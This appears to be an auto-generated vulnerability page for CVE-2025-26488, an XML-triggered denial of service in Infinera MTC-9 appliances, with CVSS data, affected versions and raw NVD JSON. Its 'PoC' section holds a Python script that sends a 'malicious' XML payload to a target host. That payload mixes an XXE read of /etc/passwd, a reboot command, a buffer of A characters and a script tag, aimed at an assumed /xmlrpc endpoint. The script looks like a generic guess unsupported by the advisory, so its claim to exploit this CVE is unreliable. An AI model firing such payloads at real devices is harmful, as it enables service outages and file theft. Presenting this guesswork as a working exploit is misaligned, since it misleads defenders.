Security Vulnerability Report
中文
CVE-2025-26488 CVSS 7.5 HIGH

CVE-2025-26488

Published: 2025-12-08 09:15:47
Last Modified: 2025-12-22 18:56:01
Source: a6d3dc9e-0591-4a13-bce7-0f5b31ff6158

Description

Improper Input Validation vulnerability in Infinera MTC-9 allows remote unauthenticated users to crash the service and cause a reboot of the appliance, thus causing a DoS condition, via crafted XML payloads.This issue affects MTC-9: from R22.1.1.0275 before R23.0.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:nokia:infinera_mtc-9_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nokia:infinera_mtc-9:-:*:*:*:*:*:*:* - NOT VULNERABLE
Infinera MTC-9 R22.1.1.0275 至 R22.x.x.x
Infinera MTC-9 R23.0 之前的所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-26488 PoC - Infinera MTC-9 XML Input Validation DoS Note: This PoC is for educational and authorized testing purposes only. """ import socket import time def create_malicious_xml(): """Generate malicious XML payload to trigger the vulnerability""" # Malicious XML with deeply nested elements to trigger parser issues malicious_xml = '''<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root> <device> <type>MTC-9</type> <command>reboot</command> <nested> <level1> <level2> <level3><![CDATA[ ''' + 'A' * 10000 + ''' ]]></level3> </level2> </level1> </nested> <![CDATA[ <script>malicious content here</script> ]]> </device> </root>''' return malicious_xml def send_xml_payload(target_ip, target_port=443): """Send malicious XML payload to target""" xml_payload = create_malicious_xml() http_request = f"POST /xmlrpc HTTP/1.1\r\n" http_request += f"Host: {target_ip}:{target_port}\r\n" http_request += "Content-Type: text/xml\r\n" http_request += f"Content-Length: {len(xml_payload)}\r\n" http_request += "Connection: close\r\n" http_request += "\r\n" http_request += xml_payload try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) sock.sendall(http_request.encode()) print(f"[+] Malicious payload sent to {target_ip}:{target_port}") # Wait to observe service response time.sleep(2) response = sock.recv(4096) print(f"[*] Response received: {response[:100]}") sock.close() return True except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": import sys if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 443 print(f"[*] Sending CVE-2025-26488 exploit payload to {target}") send_xml_payload(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-26488", "sourceIdentifier": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "published": "2025-12-08T09:15:46.660", "lastModified": "2025-12-22T18:56:00.847", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Input Validation vulnerability in Infinera MTC-9 allows remote unauthenticated users to crash the service and cause a \nreboot of the appliance, thus causing a DoS condition, via crafted XML \npayloads.This issue affects MTC-9: from R22.1.1.0275 before R23.0."}], "metrics": {"cvssMetricV31": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nokia:infinera_mtc-9_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "22.1.1.0275", "versionEndExcluding": "23.0", "matchCriteriaId": "2C084211-7CFB-4149-BC00-609E29A3EF60"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nokia:infinera_mtc-9:-:*:*:*:*:*:*:*", "matchCriteriaId": "48C75FDC-0C46-4EC4-BCC9-EBAD117A84FD"}]}]}], "references": [{"url": "https://www.cvcn.gov.it/cvcn/cve/CVE-2025-26488", "source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "tags": ["Third Party Advisory"]}]}}